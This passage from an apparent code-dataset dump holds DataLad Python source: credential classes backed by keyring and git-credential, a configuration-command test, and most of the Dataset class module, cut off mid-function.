self._FIELDS[f].get('optional', False)\n\n @property\n def is_known(self):\n \"\"\"Return True if values for all fields of the credential are known\"\"\"\n try:\n return all(\n self._is_field_optional(f) or self._get_field_value(f) is not None\n for f in self._FIELDS)\n except Exception as exc:\n ce = CapturedException(exc)\n lgr.warning(\"Failed to query keyring: %s\", ce)\n return False\n\n def _get_field_value(self, field):\n return dlcfg.get('datalad.credential.{name}.{field}'.format(\n name=self.name,\n field=field.replace('_', '-')\n )) or self._keyring.get(self.name, field)\n\n def _ask_field_value(self, f, instructions=None):\n msg = instructions if instructions else \\\n (\"You need to authenticate with %r credentials.\" % self.name +\n (\" %s provides information on how to gain access\"\n % self.url if self.url else ''))\n\n # provide custom options only if set for the field\n f_props = self._FIELDS[f]\n kwargs = {}\n for p in ('hidden', 'repeat'):\n if p in f_props:\n kwargs[p] = f_props[p]\n return ui.question(\n f,\n title=msg,\n **kwargs\n )\n\n def _ask_and_set(self, f, instructions=None):\n v = self._ask_field_value(f, instructions=instructions)\n try:\n self.set(**{f: v})\n except Exception as e:\n lgr.error(\"Failed to record credential field %r: %s\", f, CapturedException(e))\n return v\n\n def enter_new(self, instructions=None, **kwargs):\n \"\"\"Enter new values for the credential fields\n\n Parameters\n ----------\n instructions : str, optional\n If given, the auto-generated instructions based on a login-URL are\n replaced by the given string\n **kwargs\n Any given key value pairs with non-None values are used to set the\n field `key` to the given value, without asking for user input\n \"\"\"\n if kwargs:\n unknown_fields = set(kwargs).difference(self._FIELDS)\n known_fields = set(self._FIELDS).difference(kwargs)\n if unknown_fields:\n raise ValueError(\n \"Unknown to %s field(s): %s. Known but not specified: %s\"\n % (self,\n ', '.join(sorted(unknown_fields)),\n ', '.join(sorted(known_fields))\n ))\n # Use ui., request credential fields corresponding to the type\n for f in self._FIELDS:\n if kwargs.get(f, None):\n # use given value, don't ask\n self.set(**{f: kwargs[f]})\n elif not self._is_field_optional(f):\n self._ask_and_set(f, instructions=instructions)\n\n def __call__(self, instructions=None):\n \"\"\"Obtain credentials from a keyring and if any is not known -- ask\n\n Parameters\n ----------\n instructions : str, optional\n If given, the auto-generated instructions based on a login-URL are\n replaced by the given string\n \"\"\"\n fields = {}\n # check if we shall ask for credentials, even if some are on record\n # already (but maybe they were found to need updating)\n force_reentry = dlcfg.obtain(\n 'datalad.credentials.force-ask',\n valtype=anything2bool)\n for f in self._FIELDS:\n # don't query for value if we need to get a new one\n v = None if force_reentry else self._get_field_value(f)\n if not self._is_field_optional(f):\n while v is None: # was not known\n v = self._ask_and_set(f, instructions=instructions)\n fields[f] = v\n elif v is not None:\n fields[f] = v\n return fields\n\n def set(self, **kwargs):\n \"\"\"Set field(s) of the credential\"\"\"\n for f, v in kwargs.items():\n if f not in self._FIELDS:\n raise ValueError(\"Unknown field %s. Known are: %s\"\n % (f, self._FIELDS.keys()))\n self._keyring.set(self.name, f, v)\n\n def get(self, f, default=None):\n \"\"\"Get a field of the credential\"\"\"\n if f not in self._FIELDS:\n raise ValueError(\"Unknown field %s. Known are: %s\"\n % (f, self._FIELDS.keys()))\n try:\n return self._get_field_value(f)\n except: # MIH: what could even happen? _keyring not a dict?\n return default\n\n def delete(self):\n \"\"\"Deletes credential values from the keyring\"\"\"\n for f in self._FIELDS:\n self._keyring.delete(self.name, f)\n\n def set_context(self, auth_url=None, dataset=None):\n \"\"\"Set URL/dataset context after instantiation\n\n ATM by design the system of providers+downloaders+credentials doesn't\n necessarily provide access to that information at instantiation time of\n `Credential` objects. Hence, allow to provide this whenever we can.\n\n Arguments are only applied if provided. Hence, `None` does not overwrite\n a possibly already existing attribute.\n\n Note\n ----\n Eventually, this is going to need a major overhaul. `Providers` etc. are\n built to be mostly unaware of their context, which is why\n `get_dataset_root()` tends to be the only way of assessing what dataset\n we are operating on. This will, however, fail to detect the correct\n dataset, if it can'T be deduced from PWD, though.\n\n Parameters\n ----------\n auth_url : str, optional\n URL string this credential is going to be used with. This context\n may be needed to query some credential systems (like git-credential).\n dataset : str, Path or Dataset, optional\n The dataset datalad is operating on with this credential. This may\n be needed for context in order to query local configs.\n \"\"\"\n\n # TODO: change of context should probably not be allowed. When context\n # is actually needed for a particular credential store, this\n # object represents such associated creds.\n # Allowing to switch context within the same instance leads to\n # trouble determining when exactly a reload is needed and what is\n # to be overwritten or not.\n\n\n\n if auth_url:\n self.auth_url = auth_url\n if isinstance(dataset, Dataset):\n self.ds = dataset\n else:\n self.ds = Dataset(dataset) if dataset else None\n\n\nclass UserPassword(Credential):\n \"\"\"Simple type of a credential which consists of user/password pair\"\"\"\n\n _FIELDS = dict([('user', {}),\n ('password', {'hidden': True})])\n\n is_expired = False # no expiration provisioned\n\n\nclass Token(Credential):\n \"\"\"Simple type of a credential which provides a single token\"\"\"\n\n _FIELDS = dict([('token', {'hidden': True, 'repeat': False})])\n\n is_expired = False # no expiration provisioned\n\n\nclass AWS_S3(Credential):\n \"\"\"Credential for AWS S3 service\"\"\"\n\n _FIELDS = dict([('key_id', {'repeat': False}),\n ('secret_id', {'hidden': True, 'repeat': False}),\n ('session', {'optional': True}),\n ('expiration', {'optional': True}),\n ])\n\n @property\n def is_expired(self):\n exp = self.get('expiration', None)\n if not exp:\n return False\n exp_epoch = iso8601_to_epoch(exp)\n # -2 to artificially shorten duration of the allotment to avoid\n # possible race conditions between us checking either it has\n # already expired before submitting a request.\n expire_in = (exp_epoch - time.time() - 2) / 3600.\n\n lgr.debug(\n (\"Credential %s has expired %.2fh ago\"\n if expire_in <= 0 else \"Credential %s will expire in %.2fh\")\n % (self.name, expire_in))\n return expire_in <= 0\n\n\n@auto_repr\nclass CompositeCredential(Credential):\n \"\"\"Credential which represent a sequence of Credentials where front one is exposed to user\n \"\"\"\n\n # To be defined in sub-classes\n _CREDENTIAL_CLASSES = None\n _CREDENTIAL_ADAPTERS = None\n\n def _prepare(self):\n assert len(self._CREDENTIAL_CLASSES) > 1, \"makes sense only if there is > 1 credential\"\n assert len(self._CREDENTIAL_CLASSES) == len(self._CREDENTIAL_ADAPTERS) + 1, \\\n \"there should be 1 less of adapter than _CREDENTIAL_CLASSES\"\n\n for C in self._CREDENTIAL_CLASSES:\n assert issubclass(C, Credential), \"%s must be a subclass of Credential\" % C\n\n # First credential should bear the name and url\n credentials = [self._CREDENTIAL_CLASSES[0](self.name, url=self.url, keyring=self._keyring)]\n # and we just reuse its _FIELDS for _ask_field_value etc\n self._FIELDS = credentials[0]._FIELDS\n # the rest with index suffix, but storing themselves in the same keyring\n for iC, C in enumerate(self._CREDENTIAL_CLASSES[1:]):\n credentials.append(\n C(name=\"%s:%d\" % (self.name, iC + 1), url=None, keyring=self._keyring)\n )\n self._credentials = credentials\n\n super(CompositeCredential, self)._prepare()\n\n # Here it becomes tricky, since theoretically it is the \"tail\"\n # ones which might expire etc, so we wouldn't exactly know what\n # new credentials outside process wanted -- it would be silly to ask\n # right away the \"entry\" credentials if it is just the expiration of the\n # tail credentials\n def enter_new(self):\n # should invalidate/remove all tail credentials to avoid failing attempts to login\n self._credentials[0].enter_new()\n self.refresh()\n\n def refresh(self):\n \"\"\"Re-establish \"dependent\" credentials\n\n E.g. if code outside was reported that it expired somehow before known expiration datetime\n \"\"\"\n for c in self._credentials[1:]:\n c.delete()\n # trigger re-establishing the chain\n _ = self()\n if self.is_expired:\n raise RuntimeError(\"Credential %s expired right upon refresh: should have not happened\")\n\n @property\n def is_expired(self):\n return any(c.is_expired for c in self._credentials)\n\n def __call__(self):\n \"\"\"Obtain credentials from a keyring and if any is not known -- ask\"\"\"\n # Start from the tail until we have credentials set\n idx = len(self._credentials) - 1\n for c in self._credentials[::-1]:\n if c.is_known and not c.is_expired:\n break\n idx -= 1\n\n if idx < 0:\n # none was known, all the same -- start with the first one\n idx = 0\n\n # TODO: consider moving logic of traversal into authenticator since it is\n # the one spitting out authentication error etc\n # Theoretically we could just reuse 'fields' from adapter in the next step\n # but let's do full circle, so that if any \"normalization\" is done by\n # Credentials we take that into account\n for c, adapter, next_c in zip(\n self._credentials[idx:],\n self._CREDENTIAL_ADAPTERS[idx:],\n self._credentials[idx + 1:]):\n fields = c()\n next_fields = adapter(self, **fields)\n next_c.set(**next_fields)\n\n return self._credentials[-1]()\n\n\ndef _nda_adapter(composite, user=None, password=None):\n from datalad.support.third.nda_aws_token_generator import NDATokenGenerator\n from .. import cfg\n nda_auth_url = cfg.obtain('datalad.externals.nda.dbserver')\n gen = NDATokenGenerator(nda_auth_url)\n lgr.debug(\"Generating token for NDA user %s using %s talking to %s\",\n user, gen, nda_auth_url)\n try:\n token = gen.generate_token(user, password)\n except Exception as exc: # it is really just an \"Exception\"\n exc_str = str(exc).lower()\n # ATM it is \"Invalid username and/or password\"\n # but who knows what future would bring\n if \"invalid\" in exc_str and (\"user\" in exc_str or \"password\" in exc_str):\n raise AccessDeniedError(exc_str)\n raise\n # There are also session and expiration we ignore... TODO anything about it?!!!\n # we could create a derived AWS_S3 which would also store session and expiration\n # and then may be Composite could use those????\n return dict(key_id=token.access_key, secret_id=token.secret_key,\n session=token.session, expiration=token.expiration)\n\n\nclass NDA_S3(CompositeCredential):\n \"\"\"Credential to access NDA AWS\n\n So for NDA we need a credential which is a composite credential.\n User provides UserPassword and then some adapter generates AWS_S3\n out of it\n \"\"\"\n _CREDENTIAL_CLASSES = (UserPassword, AWS_S3)\n _CREDENTIAL_ADAPTERS = (_nda_adapter,)\n\n\ndef _loris_adapter(composite, user=None, password=None, **kwargs):\n from datalad.support.third.loris_token_generator import LORISTokenGenerator\n\n gen = LORISTokenGenerator(url=composite.url)\n token = gen.generate_token(user, password)\n\n return dict(token=token)\n\n\nclass LORIS_Token(CompositeCredential):\n _CREDENTIAL_CLASSES = (UserPassword, Token)\n _CREDENTIAL_ADAPTERS = (_loris_adapter,)\n\n def __init__(self, name, url=None, keyring=None):\n super(CompositeCredential, self).__init__(name, url, keyring)\n\n\nclass GitCredential(Credential):\n \"\"\"Credential to access git-credential\n \"\"\"\n\n\n _FIELDS = dict([('user', {}),\n ('password', {'hidden': True})])\n\n # substitute keys used within datalad by the ones used by git-credential\n _FIELDS_GIT = {'user': 'username',\n 'password': 'password'}\n\n is_expired = False # no expiration provisioned\n\n def __init__(self, name, url=None, keyring=None,\n auth_url=None, dataset=None):\n super().__init__(name, url=url, keyring=keyring,\n auth_url=auth_url, dataset=dataset)\n\n def _get_field_value(self, field):\n\n from datalad import cfg as dlcfg\n cfg = self.ds.config if self.ds else dlcfg\n cfg.reload()\n from_cfg = cfg.get('datalad.credential.{name}.{field}'.format(\n name=self.name,\n field=field.replace('_', '-')\n ))\n\n if from_cfg:\n # config takes precedence\n return from_cfg\n\n # Note:\n # In opposition to the keyring approach of other `Credential`s,\n # we don't query for single values, but for an entire \"description\".\n # Currently required methods have to return single values, though.\n # Hence, calls to `git credential fill` could be optimised. Not easy to\n # assess when exactly this class can know whether it's context is yet to\n # be completed, though, so that another `fill` would actually yield\n # something different than before.\n\n self._git_cred.fill()\n git_field = self._FIELDS_GIT[field] # translate to git-credential terms\n if git_field in self._git_cred and self._git_cred[git_field]:\n return self._git_cred[git_field]\n\n # we got nothing\n return\n\n def set(self, **kwargs):\n for f, v in kwargs.items():\n if f not in self._FIELDS:\n raise ValueError(\"Unknown field %s. Known are: %s\"\n % (f, self._FIELDS.keys()))\n\n mapped = {self._FIELDS_GIT[k]: v for k, v in kwargs.items()}\n self._git_cred = GitCredentialInterface(url=self.auth_url, repo=self.ds,\n **mapped)\n self._git_cred.approve()\n\n def delete(self):\n \"\"\"Deletes credential\"\"\"\n self._git_cred.reject()\n\n def set_context(self, auth_url=None, dataset=None):\n super().set_context(auth_url, dataset)\n self._git_cred = GitCredentialInterface(url=auth_url, repo=dataset)\n" }, { "alpha_fraction": 0.5753265023231506, "alphanum_fraction": 0.5804570913314819, "avg_line_length": 27.586666107177734, "blob_id": "59016004a04244e39ea45e01192ee052a90f50a2", "content_id": "f5e4ea2d9dc2a26403636af6f6fc4dc6f029b6a0", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4290, "license_type": "permissive", "max_line_length": 79, "num_lines": 150, "path": "/datalad/local/tests/test_configuration.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# -*- coding: utf-8 -*-\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"\n\n\"\"\"\n\nfrom os.path import join as opj\n\nfrom packaging.version import Version\n\nimport datalad\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_raises,\n assert_result_count,\n swallow_outputs,\n with_tempfile,\n with_tree,\n)\n\n# before 0.14 ui.message() (used in dump) was not friendly to unicode\ncomplicated_str = 'complicated {} beast with.dot'.format(\n \"の\" if Version(datalad.__version__) >= Version('0.14.0') else 'blob'\n)\n\n_config_file_content = \"\"\"\\\n[something \"user\"]\nname = Jane Doe\nemail = [email protected]\nnovalue\nempty =\nmyint = 3\n\n[onemore \"{}\"]\nfindme = 5.0\n\"\"\".format(complicated_str)\n\n_dataset_config_template = {\n 'ds': {\n '.datalad': {\n 'config': _config_file_content}}}\n\n\n@with_tree(tree=_dataset_config_template)\n@with_tempfile(mkdir=True)\ndef test_something(path=None, new_home=None):\n ds = Dataset(opj(path, 'ds')).create(force=True)\n ds.save()\n\n # catches unsupported argument combinations\n assert_raises(ValueError, ds.configuration, 'dump', scope='branch')\n assert_raises(ValueError, ds.configuration, 'set', spec=('onlyname',))\n assert_raises(ValueError, ds.configuration, 'set', spec='nosection=value')\n # we also get that from the internal helper\n from datalad.local.configuration import configuration as cfghelper\n assert_in_results(\n cfghelper('set', 'global', [('nosection', 'value')], {}),\n status='error',\n )\n assert_raises(ValueError, ds.configuration, 'invalid')\n res = ds.configuration(result_renderer='disabled')\n\n assert_in_results(\n res,\n name='something.user.name',\n value='Jane Doe')\n # UTF handling\n assert_in_results(\n res,\n name=u'onemore.{}.findme'.format(complicated_str),\n value='5.0')\n\n res = ds.configuration(\n 'set',\n spec='some.more=test',\n result_renderer='disabled',\n )\n assert_in_results(\n res,\n name='some.more',\n value='test')\n # Python tuple specs\n # swallow outputs to be able to exercise the result renderer\n with swallow_outputs():\n res = ds.configuration(\n 'set',\n spec=[\n ('some.more.still', 'test2'),\n # value is non-str -- will be converted\n ('lonely.val', 4)],\n )\n assert_in_results(\n res,\n name='some.more.still',\n value='test2')\n assert_in_results(\n res,\n name='lonely.val',\n value='4')\n\n assert_in_results(\n ds.configuration('get', spec='lonely.val'),\n status='ok',\n name='lonely.val',\n value='4',\n )\n\n # remove something that does not exist in the specified scope\n assert_in_results(\n ds.configuration('unset', scope='branch', spec='lonely.val',\n result_renderer='disabled', on_failure='ignore'),\n status='error')\n # remove something that does not exist in the specified scope\n assert_in_results(\n ds.configuration('unset', spec='lonely.val',\n result_renderer='disabled'),\n status='ok')\n assert_not_in('lonely.val', ds.config)\n # errors if done again\n assert_in_results(\n ds.configuration('unset', spec='lonely.val',\n result_renderer='disabled', on_failure='ignore'),\n status='error')\n\n # add a subdataset to test recursive operation\n subds = ds.create('subds')\n\n with swallow_outputs():\n res = ds.configuration('set', spec='rec.test=done', recursive=True)\n assert_result_count(\n res,\n 2,\n name='rec.test',\n value='done',\n )\n\n # exercise the result renderer\n with swallow_outputs() as cml:\n ds.configuration(recursive=True)\n # we get something on the subds with the desired markup\n assert_in('<ds>/subds:rec.test=done', cml.out)\n" }, { "alpha_fraction": 0.6075718998908997, "alphanum_fraction": 0.6087865829467773, "avg_line_length": 39.4863395690918, "blob_id": "aa566315a62705be72353eb8ee33634d9dda539f", "content_id": "029cf507b840267d9c3d5d5720e98713ed3bf65f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29636, "license_type": "permissive", "max_line_length": 118, "num_lines": 732, "path": "/datalad/distribution/dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Implements class Dataset\n\"\"\"\n\nimport inspect\nimport logging\nfrom functools import wraps\nfrom os.path import (\n curdir,\n exists,\n join as opj,\n normpath,\n pardir,\n)\nfrom weakref import WeakValueDictionary\n\nfrom datalad import cfg\nfrom datalad.config import ConfigManager\nfrom datalad.core.local.repo import repo_from_path\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.constraints import Constraint\n# DueCredit\nfrom datalad.support.due import due\nfrom datalad.support.due_utils import duecredit_dataset\nfrom datalad.support.exceptions import (\n NoDatasetFound,\n)\nfrom datalad.dataset.repo import (\n path_based_str_repr,\n PathBasedFlyweight,\n)\nfrom datalad.support.gitrepo import (\n GitRepo,\n)\nfrom datalad.support import path as op\n\nimport datalad.utils as ut\nfrom datalad.utils import (\n getpwd,\n optional_args,\n get_dataset_root,\n get_sig_param_names,\n # TODO remove after a while, when external consumers have adjusted\n # to use get_dataset_root()\n get_dataset_root as rev_get_dataset_root,\n Path,\n PurePath,\n ensure_list,\n)\n\n\nlgr = logging.getLogger('datalad.dataset')\nlgr.log(5, \"Importing dataset\")\n\n\n@path_based_str_repr\nclass Dataset(object, metaclass=PathBasedFlyweight):\n \"\"\"Representation of a DataLad dataset/repository\n\n This is the core data type of DataLad: a representation of a dataset.\n At its core, datasets are (git-annex enabled) Git repositories. This\n class provides all operations that can be performed on a dataset.\n\n Creating a dataset instance is cheap, all actual operations are\n delayed until they are actually needed. Creating multiple `Dataset`\n class instances for the same Dataset location will automatically\n yield references to the same object.\n\n A dataset instance comprises of two major components: a `repo`\n attribute, and a `config` attribute. The former offers access to\n low-level functionality of the Git or git-annex repository. The\n latter gives access to a dataset's configuration manager.\n\n Most functionality is available via methods of this class, but also\n as stand-alone functions with the same name in `datalad.api`.\n \"\"\"\n # Begin Flyweight\n _unique_instances = WeakValueDictionary()\n\n @classmethod\n def _flyweight_preproc_path(cls, path):\n \"\"\"Custom handling for few special abbreviations for datasets\"\"\"\n path_ = path\n if path in ('^', '^.'):\n dsroot = get_dataset_root(curdir)\n if dsroot is None:\n raise NoDatasetFound('No dataset contains path: {}'.format(\n str(Path.cwd())))\n if path == '^':\n # get the topmost dataset from current location. Note that 'zsh'\n # might have its ideas on what to do with ^, so better use as -d^\n path_ = Dataset(dsroot).get_superdataset(\n topmost=True).path\n elif path == '^.':\n # the dataset containing current directory\n path_ = dsroot\n elif path == '///':\n # TODO: logic/UI on installing a default dataset could move here\n # from search?\n path_ = cfg.obtain('datalad.locations.default-dataset')\n if path != path_:\n lgr.debug(\"Resolved dataset alias %r to path %r\", path, path_)\n return path_\n\n @classmethod\n def _flyweight_postproc_path(cls, path):\n # we want an absolute path, but no resolved symlinks\n if not op.isabs(path):\n path = op.join(op.getpwd(), path)\n\n # use canonical paths only:\n return op.normpath(path)\n\n def _flyweight_invalid(self):\n \"\"\"Invalidation of Flyweight instance\n\n Dataset doesn't need to be invalidated during its lifetime at all. Instead the underlying *Repo instances are.\n Dataset itself can represent a not yet existing path.\n \"\"\"\n return False\n # End Flyweight\n\n def __hash__(self):\n # the flyweight key is already determining unique instances\n # add the class name to distinguish from strings of a path\n return hash((self.__class__.__name__, self.__weakref__.key))\n\n def __init__(self, path):\n \"\"\"\n Parameters\n ----------\n path : str or Path\n Path to the dataset location. This location may or may not exist\n yet.\n \"\"\"\n self._pathobj = path if isinstance(path, ut.Path) else None\n if isinstance(path, ut.PurePath):\n path = str(path)\n self._path = path\n self._repo = None\n self._id = None\n self._cfg = None\n self._cfg_bound = None\n\n @property\n def pathobj(self):\n \"\"\"pathobj for the dataset\"\"\"\n # XXX this relies on the assumption that self._path as managed\n # by the base class is always a native path\n if not self._pathobj:\n self._pathobj = ut.Path(self._path)\n return self._pathobj\n\n def __eq__(self, other):\n if not hasattr(other, 'pathobj'):\n return False\n # Ben: https://github.com/datalad/datalad/pull/4057#discussion_r370153586\n # It's pointing to the same thing, while not being the same object\n # (in opposition to the *Repo classes). So `ds1 == ds2`,\n # `but ds1 is not ds2.` I thought that's a useful distinction. On the\n # other hand, I don't think we use it anywhere outside tests yet.\n me_exists = self.pathobj.exists()\n other_exists = other.pathobj.exists()\n if me_exists != other_exists:\n # no chance this could be the same\n return False\n elif me_exists:\n # check on filesystem\n return self.pathobj.samefile(other.pathobj)\n else:\n # we can only do lexical comparison.\n # this will fail to compare a long and a shortpath.\n # on windows that could actually point to the same thing\n # if it would exists, but this is how far we go with this.\n return self.pathobj == other.pathobj\n\n def __getattr__(self, attr):\n # Assure that we are not just missing some late binding @datasetmethod .\n if not attr.startswith('_'): # do not even consider those\n lgr.debug(\"Importing datalad.api to possibly discover possibly not yet bound method %r\", attr)\n # load entire datalad.api which will also bind datasetmethods\n # from extensions.\n import datalad.api\n # which would bind all known interfaces as well.\n # Although adds overhead, good for UX\n return super(Dataset, self).__getattribute__(attr)\n\n def close(self):\n \"\"\"Perform operations which would close any possible process using this Dataset\n \"\"\"\n repo = self._repo\n self._repo = None\n if repo:\n # might take care about lingering batched processes etc\n del repo\n\n @property\n def path(self):\n \"\"\"path to the dataset\"\"\"\n return self._path\n\n @property\n def repo(self):\n \"\"\"Get an instance of the version control system/repo for this dataset,\n or None if there is none yet (or none anymore).\n\n If testing the validity of an instance of GitRepo is guaranteed to be\n really cheap this could also serve as a test whether a repo is present.\n\n Note, that this property is evaluated every time it is used. If used\n multiple times within a function it's probably a good idea to store its\n value in a local variable and use this variable instead.\n\n Returns\n -------\n GitRepo or AnnexRepo\n \"\"\"\n\n # If we already got a *Repo instance, check whether it's still valid;\n # Note, that this basically does part of the testing that would\n # (implicitly) be done in the loop below again. So, there's still\n # potential to speed up when we actually need to get a new instance\n # (or none). But it's still faster for the vast majority of cases.\n #\n # TODO: Dig deeper into it and melt with new instance guessing. This\n # should also involve to reduce redundancy of testing such things from\n # within Flyweight.__call__, AnnexRepo.__init__ and GitRepo.__init__!\n #\n # Also note, that this could be forged into a single big condition, but\n # that is hard to read and we should be well aware of the actual\n # criteria here:\n if self._repo is not None and self.pathobj.resolve() == self._repo.pathobj:\n # we got a repo and path references still match\n if isinstance(self._repo, AnnexRepo):\n # it's supposed to be an annex\n # Here we do the same validation that Flyweight would do beforehand if there was a call to AnnexRepo()\n if self._repo is AnnexRepo._unique_instances.get(\n self._repo.path, None) and not self._repo._flyweight_invalid():\n # it's still the object registered as flyweight and it's a\n # valid annex repo\n return self._repo\n elif isinstance(self._repo, GitRepo):\n # it's supposed to be a plain git\n # same kind of checks as for AnnexRepo above, but additionally check whether it was changed to have an\n # annex now.\n # TODO: Instead of is_with_annex, we might want the cheaper check for an actually initialized annex.\n # However, that's not completely clear. On the one hand, if it really changed to be an annex\n # it seems likely that this happened locally and it would also be an initialized annex. On the\n # other hand, we could have added (and fetched) a remote with an annex, which would turn it into\n # our current notion of an uninitialized annex. Question is whether or not such a change really\n # need to be detected. For now stay on the safe side and detect it.\n if self._repo is GitRepo._unique_instances.get(\n self._repo.path, None) and not self._repo._flyweight_invalid() and not \\\n self._repo.is_with_annex():\n # it's still the object registered as flyweight, it's a\n # valid git repo and it hasn't turned into an annex\n return self._repo\n\n # Note: Although it looks like the \"self._repo = None\" assignments\n # could be used instead of variable \"valid\", that's a big difference!\n # The *Repo instances are flyweights, not singletons. self._repo might\n # be the last reference, which would lead to those objects being\n # destroyed and therefore the constructor call would result in an\n # actually new instance. This is unnecessarily costly.\n try:\n self._repo = repo_from_path(self._path)\n except ValueError:\n lgr.log(5, \"Failed to detect a valid repo at %s\", self.path)\n self._repo = None\n return\n\n if due.active:\n # TODO: Figure out, when exactly this is needed. Don't think it\n # makes sense to do this for every dataset,\n # no matter what => we want .repo to be as cheap as it gets.\n # Makes sense only on installed dataset - @never_fail'ed\n duecredit_dataset(self)\n\n return self._repo\n\n @property\n def id(self):\n \"\"\"Identifier of the dataset.\n\n This identifier is supposed to be unique across datasets, but identical\n for different versions of the same dataset (that have all been derived\n from the same original dataset repository).\n\n Note, that a plain git/git-annex repository doesn't necessarily have\n a dataset id yet. It is created by `Dataset.create()` and stored in\n .datalad/config. If None is returned while there is a valid repository,\n there may have never been a call to `create` in this branch before\n current commit.\n\n Note, that this property is evaluated every time it is used. If used\n multiple times within a function it's probably a good idea to store its\n value in a local variable and use this variable instead.\n\n Returns\n -------\n str\n This is either a stored UUID, or `None`.\n \"\"\"\n\n return self.config.get('datalad.dataset.id', None)\n\n @property\n def config(self):\n \"\"\"Get a ``ConfigManager`` instance for a dataset's configuration\n\n In case a dataset does not (yet) have an existing corresponding\n repository, the returned ``ConfigManager`` is the global instance\n that is also provided via ``datalad.cfg``.\n\n Note, that this property is evaluated every time it is used. If used\n multiple times within a function it's probably a good idea to store its\n value in a local variable and use this variable instead.\n\n Returns\n -------\n ConfigManager\n \"\"\"\n # OPT: be \"smart\" and avoid re-resolving .repo -- expensive in DataLad\n repo = self.repo\n if repo is None:\n # if there's no repo (yet or anymore), we can't read/write config at\n # dataset level, but only at user/system level\n # However, if this was the case before as well, we don't want a new\n # instance of ConfigManager, but use the global one\n if self._cfg_bound in (True, None):\n # for the sake of uniformity assign datalad.cfg to self._cfg\n self._cfg = cfg\n self._cfg_bound = False\n\n else:\n self._cfg = repo.config\n self._cfg_bound = True\n\n return self._cfg\n\n def recall_state(self, whereto):\n \"\"\"Something that can be used to checkout a particular state\n (tag, commit) to \"undo\" a change or switch to a otherwise desired\n previous state.\n\n Parameters\n ----------\n whereto: str\n \"\"\"\n if not self.is_installed():\n raise RuntimeError(\n \"cannot remember a state when a dataset is not yet installed\")\n self.repo.checkout(whereto)\n\n def is_installed(self):\n \"\"\"Returns whether a dataset is installed.\n\n A dataset is installed when a repository for it exists on the filesystem.\n\n Returns\n -------\n bool\n \"\"\"\n\n return self.path is not None and exists(self.path) and \\\n self.repo is not None\n\n def get_superdataset(self, datalad_only=False, topmost=False,\n registered_only=True):\n \"\"\"Get the dataset's superdataset\n\n Parameters\n ----------\n datalad_only : bool, optional\n Whether to consider only \"datalad datasets\" (with non-None\n id), or (if False, which is default) - any git repository\n topmost : bool, optional\n Return the topmost super-dataset. Might then be the current one.\n registered_only : bool, optional\n Test whether any discovered superdataset actually contains the\n dataset in question as a registered subdataset (as opposed to\n just being located in a subdirectory without a formal relationship).\n\n Returns\n -------\n Dataset or None\n \"\"\"\n path = self.path\n sds_path = path if topmost else None\n\n def res_filter(res):\n return res.get('status') == 'ok' and res.get('type') == 'dataset'\n\n def subds_contains_path(ds, path):\n return path in sds.subdatasets(recursive=False,\n contains=path,\n result_filter=res_filter,\n on_failure='ignore',\n result_xfm='paths',\n result_renderer='disabled')\n\n while path:\n # normalize the path after adding .. so we guaranteed to not\n # follow into original directory if path itself is a symlink\n par_path = normpath(opj(path, pardir))\n sds_path_ = get_dataset_root(par_path)\n if sds_path_ is None:\n # no more parents, use previous found\n break\n\n sds = Dataset(sds_path_)\n if datalad_only:\n # test if current git is actually a dataset?\n if not sds.id:\n break\n if registered_only:\n if not subds_contains_path(sds, path):\n break\n\n # That was a good candidate\n sds_path = sds_path_\n path = par_path\n if not topmost:\n # no looping\n break\n\n if sds_path is None:\n # None was found\n return None\n\n # No postprocessing now should be necessary since get_toppath\n # tries its best to not resolve symlinks now\n\n return Dataset(sds_path)\n\n\n@optional_args\ndef datasetmethod(f, name=None, dataset_argname='dataset'):\n \"\"\"Decorator to bind functions to Dataset class.\n\n The decorated function is still directly callable and additionally serves\n as method `name` of class Dataset. To achieve this, the first positional\n argument is redirected to original keyword argument 'dataset_argname'. All\n other arguments stay in order (and keep their names, of course). That\n means, that the signature of the bound function is name(self, a, b) if the\n original signature is name(a, dataset, b) for example.\n\n The decorator has no effect on the actual function decorated with it.\n \"\"\"\n\n if not name:\n name = f.__name__\n\n @wraps(f)\n def apply_func(instance, *args, **kwargs):\n # Wrapper function to assign arguments of the bound function to\n # original function.\n #\n # Note\n # ----\n # This wrapper is NOT returned by the decorator, but only used to bind\n # the function `f` to the Dataset class.\n kwargs = kwargs.copy()\n\n # due to use of functools.wraps and inability of of getarspec to get\n # those, we use .signature.\n # More information in de-wrapt PR https://github.com/datalad/datalad/pull/6190\n from datalad.utils import get_sig_param_names\n f_args, f_kwonlyargs = get_sig_param_names(f, ('pos_any', 'kw_only'))\n\n # If bound function is used with wrong signature (especially by\n # explicitly passing a dataset), let's raise a proper exception instead\n # of a 'list index out of range', that is not very telling to the user.\n # In case whenever kwonlyargs are used, 'dataset' would not be listed\n # among args, so we would account for it (possibly) be there.\n if len(args) >= len(f_args) + int(bool(f_kwonlyargs)):\n non_dataset_args = [\"self\"] + [a for a in f_args if a != dataset_argname]\n raise TypeError(\n f\"{name}() takes at most {len(f_args)} arguments ({len(args)} given): \"\n f\"{non_dataset_args}\")\n if dataset_argname in kwargs:\n raise TypeError(\n f\"{name}() got an unexpected keyword argument {dataset_argname}\")\n kwargs[dataset_argname] = instance\n if dataset_argname in f_kwonlyargs:\n # * was used to enforce kwargs, so we just would pass things as is\n pass\n else:\n # so it is \"old\" style, where it is a regular kwargs - we pass everything\n # via 